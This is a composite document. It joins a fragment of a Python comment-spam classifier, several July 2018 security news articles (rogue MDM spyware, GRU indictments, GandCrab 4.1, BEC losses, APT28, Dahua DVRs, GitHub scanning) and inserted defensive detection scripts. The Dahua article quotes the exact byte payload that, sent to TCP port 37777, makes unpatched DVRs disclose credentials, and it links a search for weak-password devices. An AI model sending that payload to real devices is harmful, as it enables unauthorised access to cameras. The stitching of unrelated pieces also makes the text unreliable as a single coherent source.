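BLOCKED_IPS = {"203.0.113.10", "198.51.100.7"}
BLOCKED_DOMAINS = {"bet-example.test"}
# Public shorteners: the article notes the botnet used them to hide landing
# sites, so a link through one cannot be judged by its visible domain.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def extract_hosts(body):
    """Hostnames of every absolute URL in the comment body, lower-cased."""
    hosts = []
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def domain_blocked(host):
    """True if the host or any parent domain is on the blocklist."""
    parts = host.split(".")
    return any(".".join(parts[i:]) in BLOCKED_DOMAINS for i in range(len(parts) - 1))


def shingles(text, n=3):
    """Set of word n-grams; template-generated spam shares most of them."""
    words = re.findall(r"[a-z0-9']+", text.lower())
    return {" ".join(words[i:i + n]) for i in range(len(words) - n + 1)}


def similarity(a, b):
    """Jaccard similarity of the two comments' word shingles (0.0 to 1.0)."""
    sa, sb = shingles(a), shingles(b)
    if not sa or not sb:
        return 0.0
    return len(sa & sb) / len(sa | sb)


def classify_comment(ip, body, recent_bodies=(), dup_threshold=0.4):
    """Return (verdict, reasons) where verdict is 'reject', 'review' or 'accept'."""
    reasons = []
    if ip in BLOCKED_IPS:
        reasons.append(f"source IP {ip} is blocklisted")
    hosts = extract_hosts(body)
    for host in hosts:
        if domain_blocked(host):
            reasons.append(f"advertised domain {host} is blocklisted")
    if reasons:
        return "reject", reasons
    # Softer signals: hold for moderation instead of rejecting outright.
    if any(host in SHORTENERS for host in hosts):
        reasons.append("link passes through a URL shortener, destination hidden")
    if len(hosts) > 2:
        reasons.append(f"{len(hosts)} links in a single comment")
    if any(similarity(body, old) >= dup_threshold for old in recent_bodies):
        reasons.append("text closely matches a recent comment (template spam)")
    return ("review", reasons) if reasons else ("accept", [])


if __name__ == "__main__":
    earlier = "I really like your blog post, it helped me a lot with my project"
    new = "I really like your blog post, it helped me so much with my work"
    print(classify_comment("192.0.2.1", new, recent_bodies=[earlier]))
```

Hard evidence (blocklisted IP or domain) rejects outright, while shorteners, link-heavy comments and near-duplicate text only queue the comment for review, since each of those also occurs in legitimate comments.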


Mobile Malware Campaign targets users in India through rogue MDM service
19.7.2018 securityaffairs Virus

Talos researchers have uncovered a “highly targeted” campaign leveraging mobile malware distributed through a bogus MDM service.
Security experts from Cisco Talos have uncovered a “highly targeted” campaign leveraging mobile malware that has been active since at least August 2015. The researchers believe that the cyberspies are operating from China and found them spying on 13 selected iPhones in the same country.

Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.

Access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware on the targeted devices.

bogus MDM service

“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.

“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register”

Enrolling an iOS device into an MDM service requires the user to manually install an enterprise development certificate. Enterprises can obtain such certificates through the Apple Developer Enterprise Program.

Enterprises can deliver the MDM configuration file through email or a webpage for over-the-air enrollment, or with the Apple Configurator.

“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.
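Because enrollment hinges on the user accepting a configuration profile, a defender's first check on a suspicious `.mobileconfig` is which MDM server it would hand the device to. The block below is an added example, not Talos's tooling or Apple's: it builds a constructed minimal profile with Python's standard `plistlib`, then reports every `com.apple.mdm` payload, its `ServerURL` host, whether the URL uses HTTPS, and whether the host is on an allowlist; the allowlist host `mdm.corp.example` and the attacker host are hypothetical.

```python
import plistlib
from urllib.parse import urlparse

# Constructed allowlist: the only MDM server this hypothetical organisation runs.
TRUSTED_MDM_HOSTS = {"mdm.corp.example"}


def build_sample_profile(server_url):
    """Constructed minimal configuration profile carrying one MDM payload.
    Real profiles carry more keys (e.g. the identity certificate); this is
    enough to exercise the inspection below."""
    profile = {
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": "example.profile",
        "PayloadUUID": "00000000-0000-0000-0000-000000000001",
        "PayloadDisplayName": "Device Management",
        "PayloadContent": [{
            "PayloadType": "com.apple.mdm",
            "PayloadVersion": 1,
            "PayloadIdentifier": "example.profile.mdm",
            "PayloadUUID": "00000000-0000-0000-0000-000000000002",
            "ServerURL": server_url,
            "CheckInURL": server_url.rstrip("/") + "/checkin",
            "Topic": "com.apple.mgmt.External.example",  # APNS topic, constructed
            "AccessRights": 8191,
        }],
    }
    return plistlib.dumps(profile)


def inspect_profile(profile_bytes):
    """Summarise every MDM payload in a .mobileconfig and flag untrusted servers.
    Returns a list of dicts, one per com.apple.mdm payload."""
    profile = plistlib.loads(profile_bytes)
    findings = []
    for payload in profile.get("PayloadContent", []):
        if payload.get("PayloadType") != "com.apple.mdm":
            continue
        server = payload.get("ServerURL", "")
        parsed = urlparse(server)
        host = (parsed.hostname or "").lower()
        findings.append({
            "server": server,
            "host": host,
            "https": parsed.scheme == "https",
            "trusted": host in TRUSTED_MDM_HOSTS,
            "topic": payload.get("Topic", ""),
            "access_rights": payload.get("AccessRights"),
        })
    return findings


if __name__ == "__main__":
    for url in ("https://mdm.corp.example/mdm", "http://mdm.attacker.test/mdm"):
        for f in inspect_profile(build_sample_profile(url)):
            verdict = "OK" if f["trusted"] and f["https"] else "DO NOT INSTALL"
            print(f"{f['host']:<22} https={f['https']} trusted={f['trusted']} -> {verdict}")
```

A profile whose MDM server is not one the organisation operates is exactly the artefact this campaign relied on; checking the host before the user taps "Install" is cheaper than finding the sideloaded apps afterwards.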

Cisco’s Talos experts believe that the attackers either used social engineering techniques, such as a fake tech-support call, or gained physical access to the targeted devices in some way.

The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code into legitimate apps, including the messaging apps WhatsApp and Telegram, which were then deployed through the MDM service onto the 13 targeted devices in India.

The BOptions sideloading technique allowed the attacker to inject into the application a dynamic library that implements spyware capabilities. The malicious code allows the attacker to collect and exfiltrate information from the targeted device, including the phone number, serial number, location, contacts, the user’s photos, SMS messages, and Telegram and WhatsApp chat messages.

It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.

Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com

Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.

“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.

“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”

Talos was not able to attribute the attack to a specific actor or determine its motivations; they were only able to find evidence suggesting the attackers were operating from India. The experts noticed that the attackers planted a “false flag” by posing as a Russian threat actor.

“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.

Talos shared its findings with Apple, which quickly revoked the three certificates used in this campaign.

Further details, including IoCs, are reported in the analysis shared by Talos.


12 Russian Intel Officers charged with hacking into U.S. Democrats
19.7.2018 securityaffairs BigBrothers

The week closes with the indictment of twelve Russian intelligence officers by a US grand jury. The charges were announced just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
Special Counsel Robert Mueller, who on February 13 indicted Russians for a massive operation aimed at influencing the 2016 Presidential election, has now charged 12 Russian intelligence officers working for the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“There’s no allegation in this indictment that any American citizen committed a crime,” said Rosenstein. “The conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers.”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence officers set up servers in the U.S. and Malaysia under fake names to run their operations, and the agents paid for them with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The Democratic minority in the US Congress is pressing Trump to cancel the meeting with Putin, arguing that Putin intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,”

Russian intelligence

The White House (@WhiteHouse) tweeted on Jul 13, 2018 (10:03 PM): At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."

Trump evidently believes that hostility toward Russia severely damages the relationship and the collaboration between the two states.

Russia denies any involvement in the elections; the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged on Friday, but the indictment reports that unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, at least one person close to the Trump campaign and a candidate for Congress were in contact with the Russian officers.


A few days after the discovery of GandCrab ransomware ver 4.0, experts found version 4.1
19.7.2018 securityaffairs Ransomware

Security experts from Fortinet recently detected a new version of the GandCrab ransomware, ver 4.1, that is being distributed through compromised websites.
A few days ago, I wrote about the return of the GandCrab ransomware (v4), a new version appeared in the threat landscape and experts at BleepingComputer first reported it.

GandCrab ransomware is a young threat; it first appeared in the wild early this year, but it evolved rapidly and its authors have improved it over the months. As of March, the ransomware had infected over 50,000 systems and netted its operators over $600,000 in ransom payments.
Security experts from Fortinet recently detected a new version of the threat, GandCrab ransomware 4.1, that is being distributed through compromised websites designed to look like download sites for cracked applications.

Like GandCrab ransomware version 4, the new variant uses the Salsa20 stream cipher to encrypt data instead of the RSA-2048 encryption that was used in early versions of the threat.

The code of the latest variant, 4.1, includes a list of websites to which the malware connects to send data about the infected machine (i.e. IP address, username, computer name, network domain, and, if present, a list of anti-malware tools on the system).

“Only two days after the release of GandCrab 4.0, FortiGuard Labs found a newer version (v4.1) being distributed using the same method, which is through compromised websites disguised as download sites for cracked applications.” reads the analysis published by Fortinet.

“With this new version, GandCrab has added a network communication tactic that was not observed in the previous version.”

gandcrab ransomware

Why does the new variant send data to a large number of websites?

According to Fortinet, there is no evidence that the websites in the hard-coded list have actually been compromised; this suggests that the malware authors are testing the functionality or have put it there as a diversionary tactic.

“However, we found no definitive evidence that the hard-coded websites included in the malware had actually ever been compromised to act as servers or download sites for GandCrab.” continues the analysis.

“Even more curious, the fact is that sending victim information to all live hosts in the list is illogical in a practical sense, given that a single successful send would have been enough for its purposes. With these points in mind, we have started to think that this function is either experimental, or simply there to divert analysis and that the URLs included in the list are just victims of a bad humour.”

The analysis of the ransomware revealed that GandCrab ransomware 4.1 kills numerous processes that could interfere with file encryption. For example, it kills msftesql.exe, sqlagent.exe, oracle.exe, msaccess.exe, powerpnt.exe, and wordpad.exe so that it can encrypt the high-value files held open by popular applications such as Microsoft Office, Steam, Oracle, etc.
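The process-termination behaviour described above is itself a detection opportunity: a burst of database and Office processes dying within seconds of each other is unusual on a workstation. The block below is an added example, not Fortinet's code; it runs a sliding-window rule over constructed, simplified process-termination events ("<ISO timestamp> ProcessTerminate <image path>", not real telemetry) and alerts when at least three of the process names the article lists are terminated inside a ten-second window.

```python
from datetime import datetime

# Process names the article reports GandCrab 4.1 terminating before encryption.
TARGET_PROCESSES = {
    "msftesql.exe", "sqlagent.exe", "oracle.exe",
    "msaccess.exe", "powerpnt.exe", "wordpad.exe",
}

# Constructed events in a simplified "<ISO timestamp> ProcessTerminate <image>"
# form, standing in for Sysmon/EDR process-termination telemetry.
SAMPLE_EVENTS = r"""
2018-07-10T14:02:01 ProcessTerminate C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.exe
2018-07-10T14:02:01 ProcessTerminate C:\Windows\System32\notepad.exe
2018-07-10T14:02:02 ProcessTerminate C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
2018-07-10T14:02:03 ProcessTerminate C:\Program Files\Windows NT\Accessories\wordpad.exe
2018-07-10T14:02:04 ProcessTerminate C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE
2018-07-10T15:30:00 ProcessTerminate C:\Program Files\Windows NT\Accessories\wordpad.exe
""".strip().splitlines()


def parse_event(line):
    """Return (timestamp, image basename) for a ProcessTerminate line, else None."""
    try:
        stamp, kind, image = line.split(" ", 2)
    except ValueError:
        return None
    if kind != "ProcessTerminate":
        return None
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return datetime.fromisoformat(stamp), basename


def detect_mass_termination(lines, window_seconds=10, min_distinct=3):
    """Alert when >= min_distinct watched processes die within window_seconds.
    Returns a list of (window_start, set_of_process_names), one per burst."""
    events = sorted(ev for ev in map(parse_event, lines)
                    if ev and ev[1] in TARGET_PROCESSES)
    alerts, i = [], 0
    while i < len(events):
        start = events[i][0]
        seen, j = set(), i
        while j < len(events) and (events[j][0] - start).total_seconds() <= window_seconds:
            seen.add(events[j][1])
            j += 1
        if len(seen) >= min_distinct:
            alerts.append((start, seen))
            i = j            # skip the rest of this burst: one alert per window
        else:
            i += 1
    return alerts


if __name__ == "__main__":
    for start, procs in detect_mass_termination(SAMPLE_EVENTS):
        print(f"{start.isoformat()} burst of terminations: {sorted(procs)}")
```

The single wordpad.exe termination an hour later does not fire, which is the point of requiring several distinct watched processes in one window: closing one application is normal, a sweep through database and Office processes is not.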

The experts from Fortinet highlighted that there is no evidence that GandCrab ransomware 4.1 is able to spread via SMB shares, as WannaCry and Petya/NotPetya did.

“Over the past few days, numerous reports have been circulating claiming that this version of the GandCrab malware can self-propagate via an “SMB exploit”” continues the analysis.

GandCrab ransomware 4

“However, in spite of this string, we could not find any actual function that resembles the reported exploit capability. (It may also be relevant to report that this string was actually first found in v4.0 and not in v4.1, at least in the samples that we have analysed.) Since this string is not connected to any actual exploit spreading function that we could uncover, it seems much more likely that it is simply referring to the encryption of network shares, and not for any sort of exploit propagation.”

In summary, the threat continues to evolve, but it cannot spread via SMB shares yet.


FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 amount to $12 billion
19.7.2018 securityaffairs BigBrothers

The number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
The FBI has provided further data on Email Account Compromise: according to the feds, the number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large business and personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 amount to $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058, resulting in $2.9 billion in losses. The feds highlighted that most of the fraudulent activities used banks in China and Hong Kong as recipients of the fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on organizations in the real estate industry: from 2015 to 2017, there was a 1,100% increase in BEC/EAC victims.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals,” continues the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below are the BEC/EAC statistics shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299

The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 2018:

Total U.S. victims: 41,058
Total U.S. exposed dollar loss: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009

The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 2016. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:

Total U.S. financial recipients: 19,335
Total U.S. financial recipients exposed dollar loss: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278

FBI BEC

According to a report published by Trend Micro in January 2018, the damage caused to enterprises by Business Email Compromise (BEC) attacks has surpassed that of past years, and it is estimated that it could reach $9 billion in 2018.


Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.2018 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask for the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear:

“Well, I might,” Trump said.

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election but denied that they supported his campaign; he added that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed,” reported CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempted hacking of the “old emails” of the Republican National Committee was first reported by CNN in January last year, when it quoted the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”


Update CSE Malware ZLab – Operation Roman Holiday – Hunting the Russian APT28
19.7.2018 securityaffairs APT

Researchers from the Z-Lab at CSE Cybsec analyzed a new collection of malware allegedly part of a new espionage campaign conducted by the APT28 group.
It was a long weekend for the researchers from the Z-Lab at CSE Cybsec, who completed the analysis of a number of payloads that are part of a new cyber espionage campaign conducted by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

Last time experts attributed an ongoing campaign to APT28 was in June, when experts from Palo Alto Networks noticed that the group was using new tools in a recent string of attacks.

Palo Alto Networks explained that the APT group has shifted its focus from NATO member countries and Ukraine towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

While conducting ordinary threat intelligence activities, experts at Z-Lab at CSE Cybsec have recently discovered a new series of malware samples that were submitted to the major online sandboxes.

In particular, they noticed a malware sample submitted to Virus Total that was attributed by some experts to the Russian APT28 group.

The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

With the help of the researcher who goes online by the Twitter handle Drunk Binary (@DrunkBinary), researchers from Z-Lab obtained a collection of samples to compare with the one that was uploaded to the VirusTotal platform.

The analysis revealed that it was a new variant of the infamous APT28 backdoor tracked as X-Agent, in particular a new Windows version that appeared in the wild in June.

The attack analyzed by CSE Cybsec is multi-stage: the experts discovered an initial dropper written in the Delphi programming language (a language used by the APT28 group in other campaigns) that downloads a second-stage payload from the Internet and executes it.

APT28 Roman Holiday

The payload communicates to the server using HTTPS protocol, making it impossible to eavesdrop on the malicious traffic it generates.

The experts also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group.

This malware immediately caught the attention of the expert because it contacts a C2 with the name “marina-info.net” a clear reference to the Italian Military corp, Marina Militare. This lead them into believing that the malicious code was developed as part of targeted attacks against the Italian Marina Militare, or some other entities associated with it.

This last DLL seems to be completely unconnected with the previous samples, but further investigation leads the experts into believing that it was an additional component used by APT28 in this campaign to compromise the target system.

APT28 has a rich arsenal composed of a large number of modular malware, and the DLL is a component of the X-Agent sample dissected by Z-Lab.

X-Agent is a persistent payload injected into the victim machine that can be compiled for almost any operating system and can be extended with new ad-hoc components developed for a specific attack.

In this case, the component was submitted to online sandboxes while the new campaign was ongoing. The experts cannot exclude that the APT group developed the backdoor to target specific organizations, including the Italian Marina Militare or any of its subcontractors. In their analysis, the experts were not able to directly connect the malicious DLL to the X-Agent samples, but they believe they are both part of a well-coordinated surgical attack powered by APT28, tracked by Z-Lab as Roman Holiday because it targeted Italian organizations in the summertime.

The DLL that connects to “marina-info.net” might be the last-stage malware, triggered only when particular conditions occur, for example when the malware infects a system whose IP address belongs to specific ranges.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by the researchers at Z-Lab.


ZoomEye IoT search engine cached login passwords for tens of thousands of Dahua DVRs
19.7.2018 securityaffairs IoT

A security researcher discovered that the IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs.
The IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs, the discovery was made by security researcher Ankit Anubhav, Principal Researcher at NewSky Security.


Anubhav explained that the passwords are related to Dahua DVRs running very old firmware that is known to be affected by a five-year-old vulnerability tracked as CVE-2013-6117.

Even if the vulnerability has been patched, many Dahua devices are still running ancient firmware.

CVE-2013-6117 was discovered by security expert Jake Reynolds and affects Dahua DVR firmware versions 2.608.0000.0 and 2.608.GV00.0. The flaw could be exploited by remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.

An attacker only needs to open a raw TCP connection to port 37777 on a vulnerable Dahua DVR and send the exploit code that triggers the issue.

Once the Dahua device receives this code, it responds with the DDNS credentials for accessing the device, and other data, all in plaintext.

Ankit Anubhav
@ankit_anubhav
Just to make things clear to weaponize the exploit, one needs to connect to port 37777 on raw TCP + send the following message to get the ddns creds

"\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

Ankit Anubhav
@ankit_anubhav
Wow and how did I miss this.
13900+ of these devices have their password as "123456"
Check here https://goo.gl/S5G2Bh #iot #security #fail

This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices. https://twitter.com/ankit_anubhav/status/1017429425602822144 …

11:49 PM - Jul 13, 2018

Ankit Anubhav
@ankit_anubhav
Replying to @ankit_anubhav
And of course, people here too have not failed to put extremely generic passwords. https://www.zoomeye.org/searchResult?q=%2Bport%3A%2237777%22%20%22admin123%22 … 270 devices have password as "admin123" lol.

Brickerbot is known to brick the devices he pwns, so it does not look like a happy ending for these devices. @GDI_FDN

8:21 PM - Jul 13, 2018

Anubhav explained that ZoomEye scans port 37777 and caches the output in plaintext, which means that anyone with a ZoomEye account can scrape the results to obtain the credentials of tens of thousands of devices.

Anubhav reported the issue to ZoomEye, asking it to remove the passwords from its cached results, but the expert is still waiting for a reply.

The expert explained that he discovered the issue after reading a post published by the author of the BrickerBot IoT malware, which exploited the flaw to hijack and brick Dahua DVRs in the past.


Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.2018 securityaffairs BigBrothers

The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, saying that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he used the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attackers; the number of their attacks continues to increase and their level of sophistication is growing too.


The Director of National Intelligence believes that Russia is the most aggressive threat actor, and recent events demonstrate it. On Friday, Special Counsel Robert Mueller, who in February had indicted 13 Russians for a massive operation aimed at influencing the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent of stealing military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin, instead, operates to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned that the threat of a “crippling cyber attack on our critical infrastructure” by a nation-state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” reported Reuters.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He drew a parallel between the current situation in cyberspace and the “alarming activities” that U.S. intelligence detected before al Qaeda conducted the Sept. 11, 2001 attacks.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear:

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency based in St. Petersburg, which was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.


Code hosting service GitHub can now scan also for vulnerable Python code
19.7.2018 securityaffairs Vulnerability

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.
Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of GitHub security alerts in November had led to a significant reduction in vulnerable code libraries on the platform.

GitHub alerts warn developers when they include certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature initially supported JavaScript and Ruby, and the company announced it would add support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The dependency graph allows GitHub to notify project owners when it detects a known security vulnerability in one of their dependencies and to suggest known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. GitHub notified affected users, and by December 1 more than 450,000 of the vulnerabilities had been addressed, either by updating the affected library or by removing it altogether.

In the vast majority of cases, vulnerabilities are addressed within a week by active developers.

With support for Python, developers will also receive alerts for code written in this powerful programming language.

